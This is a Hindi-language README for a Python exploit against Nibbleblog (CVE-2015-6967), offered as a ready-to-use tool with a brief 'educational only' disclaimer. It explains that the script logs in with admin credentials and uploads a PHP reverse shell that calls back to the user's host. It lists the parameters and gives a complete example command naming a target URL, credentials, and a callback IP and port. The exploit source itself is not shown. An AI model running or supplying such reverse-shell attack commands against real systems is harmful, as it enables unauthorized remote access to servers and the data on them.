
CVE-2015-6967 PoC Exploit
CVE-2015-6967 PoC Exploit
यह Python स्क्रिप्ट Nibbleblog (CVE-2015-6967) में एक कमजोरी का फायदा उठाकर किसी संवेदनशील लक्ष्य पर रिवर्स शेल अपलोड करती है। स्क्रिप्ट लक्ष्य URL, उपयोगकर्ता क्रेडेंशियल्स, और आपके होस्ट IP/पोर्ट के लिए उपयोगकर्ता से इनपुट लेती है, और फिर PHP रिवर्स शेल अपलोड करके इस कमजोरी का दोहन करती है।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। अवैध गतिविधियों के लिए इसका नहीं उपयोग करें। किसी भी ऐसी प्रणाली पर कमजोरियों का परीक्षण या दोहन करने से पहले हमेशा स्पष्ट अनुमति लें जिसके आप स्वामी नहीं हैं या जिस तक पहुँचने के लिए आपके पास अधिकार नहीं है।
requests लाइब्रेरीargparse लाइब्रेरीcolorama लाइब्रेरीpyfiglet लाइब्रेरीआप निम्नलिखित कमांड का उपयोग करके आवश्यक निर्भरताएँ इंस्टॉल कर सकते हैं:
pip install requests colorama pyfiglet
उपयोग
स्क्रिप्ट को चलाने के लिए कई पैरामीटरों की आवश्यकता होती है: url: लक्ष्य Nibbleblog URL (उदा., http://10.10.14.14/nibbleblog) -U, --user: Nibbleblog व्यवस्थापक के लिए उपयोगकर्ता नाम -P, --password: Nibbleblog व्यवस्थापक के लिए पासवर्ड -p, --host-port: रिवर्स शेल के कनेक्ट होने के लिए आपका स्थानीय पोर्ट -H, --host-ip: रिवर्स शेल के कनेक्ट होने के लिए आपका स्थानीय IP पता
उदाहरण
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100